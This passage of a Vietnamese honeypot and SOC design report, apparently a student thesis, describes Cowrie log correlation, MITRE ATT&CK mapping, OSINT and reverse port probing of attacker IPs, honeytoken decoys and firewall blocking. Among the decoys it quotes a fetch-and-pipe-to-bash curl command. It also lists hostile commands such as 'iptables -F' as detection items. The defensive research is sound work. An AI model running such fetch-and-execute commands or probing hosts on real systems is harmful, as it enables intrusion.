    <w:p w14:paraId="6B4BC23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Cơ chế Quản lý Con trỏ Tệp tin (File Pointer Tracking): Module duy trì vị trí con trỏ cuối cùng (offset seek) của file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Khi có dòng log mới được Cowrie ghi xuống đĩa, tiến trình chỉ đọc chính xác phần dung lượng mới sinh ra mà không cần nạp lại toàn bộ file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54679B8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Bộ đệm &amp; Lọc Nhiễu (Filter &amp; Sanitize): Chuyển đổi định dạng chuỗi JSON thô thành đối tượng Python Dictionary có cấu trúc, kiểm tra tính toàn vẹn của gói tin và bỏ qua các bản ghi bị phân mảnh hoặc lỗi cú pháp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C6036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Cơ chế Tự phục hồi Kết nối (Self-healing &amp; Log Rotation): Khi file log bị hệ điều hành xoay vòng (Logrotate) hoặc khi dịch vụ Cowrie khởi động lại, Event Collector tự động phát hiện sự thay đổi Inode của file và mở lại luồng lắng nghe mà không làm gián đoạn hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387C4D5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3.3 Thiết kế Động cơ Tương quan Sự kiện và Ánh xạ MITRE ATT&amp;CK (Correlation Engine)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B0102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Động cơ Tương quan Sự kiện (Correlation Engine) là linh hồn kỹ thuật của đồ án, chịu trách nhiệm chuyển hóa các dòng log kỹ thuật rời rạc thành các Cảnh báo </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B486F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>An</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B486F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> ninh Có ý nghĩa (Actionable Security Alerts). Thuật toán hoạt động dựa trên nguyên lý Cửa sổ Thời gian Trượt (Sliding Time Window):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646839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Gọi W là độ rộng của cửa sổ thời gian (mặc định W = 60 giây) và T là ngưỡng số lần đăng nhập thất bại tối đa cho phép (mặc định T = 5 lần). Với mỗi địa chỉ IP nguồn S_ip gửi sự kiện 'cowrie.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B486F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>login.failed</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B486F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>' tại thời điểm t_now, thuật toán thực hiện:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8034F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1: Lấy danh sách lịch sử các mốc thời gian thất bại của S_ip: L = {t_1, t_2, ..., t_k}.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7BC5B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2: Loại bỏ toàn bộ các mốc thời gian đã trượt ra ngoài cửa sổ thời gian: L' = {t ∈ L | t_now - t ≤ W}.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495DA26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3: Thêm t_now vào L'. Nếu kích thước |L'| ≥ T, lập tức kích hoạt Cảnh báo Tấn công Dò quét Mật khẩu diện rộng (MITRE T1110.001) và xóa danh sách L' để ngăn chặn hiện tượng spam cảnh báo liên tục.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282B17F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Bên cạnh đó, Correlation Engine tự động phân loại các sự kiện đặc biệt khác và ánh xạ vào ma trận MITRE ATT&amp;CK được mô tả chi tiết trong Bảng 3.1 dưới đây:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184419F5"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3.1: Bảng ánh xạ các Sự kiện Cowrie sang Ma trận Kỹ thuật MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a6"/>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1805FF1D" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="07A485B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Mã Sự kiện Cowrie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4DA9F89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Kỹ thuật MITRE ATT&amp;CK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0CB3C86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Kỹ thuật Chuẩn</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="681AD1D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Mức độ Nguy hại</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="67F0B2B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Hành động SOAR Khuyến nghị</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="491BCE76" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3918B81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w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>login.failed</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> (đạt ngưỡng)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="045AA81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T1110.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="24F03A0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Brute Force: Password Guessing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2EEDE73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HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="77CB30C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Tarpit giam lỏng + Chặn Firewall</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="194F1A15" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4ACC624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w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>login.success</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1DE4113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T1078</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="517564B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Valid Accounts: Initial Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1FA686D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CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5290D52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Trinh sát ngược tức thì + Kích hoạt bẫy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="03CC4BA2" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0AA85F57"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cowrie.command</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>.input (uname, whoami)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="785E398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T1082</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="51D3228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System Information Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2BE161F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MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0077823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Ghi nhật ký telemetry + Giám sát phiên</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="5992F754" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4F7E47CA"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cowrie.command</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>.input (đọc canary file)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3A94EFB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T1552.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7EBD76E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 xml:space="preserve">Unsecured Credentials </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>In</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> Files</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="45876EE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CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="77B799C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Khử ẩn danh Real IP + Cô lập phiên</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="0357D2B9" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7627268E"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cowrie.session</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>.file_download</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="56FF1C0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T1105</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="13E24D7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Ingress Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6BC2DF2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CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2DF74D2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Cách ly Sandbox + Quét VirusTotal</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="7B542D4D" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5B3BB8DB"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lastRenderedPageBreak/>
              <w:t>cowrie.command</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="005B486F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>.input (iptables -F)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1D2F858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T1562.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="43212E1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Impair Defenses: Disable Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6AF29AE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HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="782D424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Gửi cảnh báo khẩn cấp cho SOC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="675AD3E3"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227FA17B"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2E37AB8F" wp14:editId="28BD4D9D">
            <wp:extent cx="5486400" cy="3086100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17015869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5486400" cy="3086100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1562A262"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3.2: Lưu đồ thuật toán Động cơ Tương quan Sự kiện và Ánh xạ MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FC5402"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3.4 Thiết kế Phân hệ Trinh sát ngược Kẻ tấn công (Reverse Intelligence Engine)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022F92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Khác với cách tiếp cận phòng thủ thụ động truyền thống (chỉ nhìn thấy IP mà không biết thông tin đối phương), Phân hệ Trinh sát ngược (Reverse Intelligence) được thiết kế để tự động thực thi chu trình điều tra tình báo nguồn mở (OSINT Pipeline) ngay trong mili-giây đầu tiên khi phát hiện IP tấn công:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760ED81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Phân giải Địa lý &amp; Nhà mạng (GeoIP &amp; ASN Profiling): Truy vấn dịch vụ phân giải địa chỉ IP để xác định quốc gia, thành phố, tọa độ địa lý, mã hệ thống tự trị (ASN) và tổ chức sở hữu dải mạng (ISP). Điều này giúp phân biệt ngay lập tức giữa các máy chủ đặt tại Datacenter (AWS, DigitalOcean, OVH) với các dải mạng người dùng băng thông rộng dân dụng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3285EB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Tra cứu Cơ sở Dữ liệu Danh tính Mã độc Toàn cầu (AbuseIPDB Reputation API): Gửi truy vấn kiểm tra lịch sử vi phạm của IP trong vòng 90 ngày gần nhất. Hệ thống trích xuất chỉ số 'Abuse Confidence Score' (từ 0 đến 100%). Nếu điểm số &gt; 40%, IP được tự động gán nhãn là 'Known Cybercrime Infrastructure'.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5696BE0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3. Tra cứu Thiết bị &amp; Lỗ hổng Mở (Shodan Host Intelligence API): Kết nối Shodan API để thu thập danh sách các cổng dịch vụ mở (Open Ports), các lỗ hổng CVE chưa được vá và hệ điều hành ước tính của máy chủ tấn công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7004820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Kỹ thuật Quét cổng Ngược An toàn (Safe Reverse Port Probing): Module chủ động thực hiện kiểm tra bắt tay TCP 3 bước (TCP SYN Connect) tới 10 cổng then chốt của IP tấn công (21, 22, 23, 80, 443, 1080, 3128, 3389, 8080, 8888) với thời gian timeout cực ngắn (300ms). Dựa trên kết quả trả về, hệ thống phân loại chính xác hình thái đối thủ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FE54C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Nếu mở cổng 23 (Telnet) hoặc 80 (Web camera): Phân loại là 'Compromised IoT / Botnet Node (Mirai variant)'.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73078D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Nếu mở cổng 1080, 3128, 8080: Phân loại là 'Anonymized Proxy / Tor Node'.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BAB9B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Nếu điểm AbuseIPDB &gt; 75%: Phân loại là 'Automated Scanner Infrastructure'.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7439F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3.5 Thiết kế Phân hệ Đánh lừa &amp; Bẫy Mồi Khử ẩn danh (Active Honeytoken Deception Engine)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDF817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Nhằm đối phó với những kẻ tấn công chuyên nghiệp sử dụng mạng ẩn danh (VPN, Tor, Proxy) để che giấu nguồn gốc khi SSH vào Honeypot, Phân hệ Active Deception Engine được thiết kế với nhiệm vụ kiến tạo một môi trường 'mồi nhử hoàn hảo' (Realistic Honey Environment):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F76341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Hệ thống tự động sinh ra và cài cắm 3 lớp tài liệu mồi nhử (Decoy Breadcrumbs):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B9B8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Fake AWS Credentials ('/root</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Giả lập tệp tin cấu hình tài khoản Amazon Web Services có quyền quản trị cao nhất đối với cụm máy chủ sao lưu cơ sở dữ liệu. Trong tệp tin này, một URL kiểm tra ngầm (Canary Endpoint) được nhúng khéo léo vào phần chú thích mã nguồn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D635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Fake Bash History ('/root/.bash_history'): Giả lập lịch sử thao tác dòng lệnh của người quản trị máy chủ, trong đó chứa một câu lệnh tải bản vá bảo mật khẩn cấp (curl -s http://.../patch.sh | bash) trỏ tới máy chủ Webhook của Blue Team.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCA39E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Fake Database Dump ('/var/backups/db_backup_2026.sql'): Giả lập tệp tin sao lưu cơ sở dữ liệu MySQL chứa các bảng tài khoản người dùng, mật khẩu quản trị và đường link truy cập vào cổng quản trị nội bộ (SSO Authentication Portal).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781C3C3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Nguyên lý Khử ẩn danh: Khi kẻ tấn công đánh cắp các tệp tin này và mang về máy tính cá nhân để khai thác, việc click vào đường link hoặc chạy lệnh sẽ kích hoạt một Webhook HTTP Request gửi thẳng từ máy thật của hacker về máy chủ SOC. Lúc này, toàn bộ lớp vỏ bọc VPN/Proxy mà hacker dùng để SSH vào Honeypot trước đó sẽ bị vô hiệu hóa hoàn toàn, để lộ địa chỉ IP thật và thông số hệ thống của thủ phạm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3E0581"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01575083" wp14:editId="0DB86837">
            <wp:extent cx="5486400" cy="3086100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17015869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486400" cy="3086100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6620AB"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3.3: Cơ chế bẫy mồi Honeytoken và khử ẩn danh kẻ tấn công (De-anonymization)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5500353C"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3.6 Thiết kế Phân hệ Phân tích và Cách ly Mã độc (Malware Sandbox &amp; Staging Pipeline)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040714F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Khi kẻ tấn công sử dụng các công cụ truyền tệp tin (wget, curl, tftp, sftp) để đưa mã độc vào máy bẫy, Phân hệ Malware Staging tự động kích hoạt chu trình phân tích gồm 4 pha:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBC1D3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Pha 1 - Tự động Cách ly (Automated Quarantine): Mã độc được di chuyển ngay lập tức vào thư mục cô lập an toàn, gắn cờ quyền chỉ đọc (Read-only) và vô hiệu hóa quyền thực thi (chmod -x) để ngăn chặn mã độc tự kích hoạt ngoài ý muốn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B9F73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Pha 2 - Tính toán Mã băm Toàn vẹn (Cryptographic Hashing): Tính toán băm MD5 và SHA256 của tệp tin để tạo ra mã nhận dạng duy nhất (Unique IOC Identifier).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464DB4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Pha 3 - Trích xuất Chuỗi Tĩnh (Static String Extraction &amp; Regex Pattern Matching): Quét toàn bộ nội dung tệp tin để tìm kiếm các địa chỉ IP máy chủ C2, các tên miền độc hại, các câu lệnh tạo backdoor và nhận diện chữ ký của các dòng họ mã độc nổi tiếng (như chữ ký của Mirai botnet, Gafgyt, hoặc XMRig Miner).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1FC7B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Pha 4 - Tích hợp Tình báo VirusTotal API: Tự động gửi mã băm SHA256 lên nền tảng VirusTotal để tra cứu tỷ lệ nhận diện độc hại (Detection Ratio), tên phân loại mã độc theo tiêu chuẩn của các hãng diệt virus hàng đầu thế giới (Kaspersky, Microsoft, CrowdStrike).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143CA97F"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3.7 Thiết kế Động cơ Thực thi Phản ứng SOAR (Firewall Enforcer &amp; Tarpitting)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763F189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Động cơ Thực thi SOAR (SOAR Enforcer) chuyển đổi các quyết định phân tích thành hành động tác chiến cụ thể trên hạ tầng mạng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9F668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Thực thi Chặn Tường lửa Động (Dynamic Firewall Enforcement): Hỗ trợ tích hợp đa nền tảng. Trên máy chủ Linux, module trực tiếp gọi tiện ích 'iptables' hoặc 'nftables' để chèn luật chặn gói tin ở mức nhân hệ điều hành: 'iptables -I INPUT -s &lt;IP&gt; -j DROP'. Trên môi trường Windows, module sử dụng 'netsh advfirewall'. Hệ thống có cơ chế kiểm tra Whitelist (danh sách trắng) để bảo vệ an toàn cho các địa chỉ IP quản trị của nhà trường/doanh nghiệp.</w:t>
      </w:r>
    </w:p>
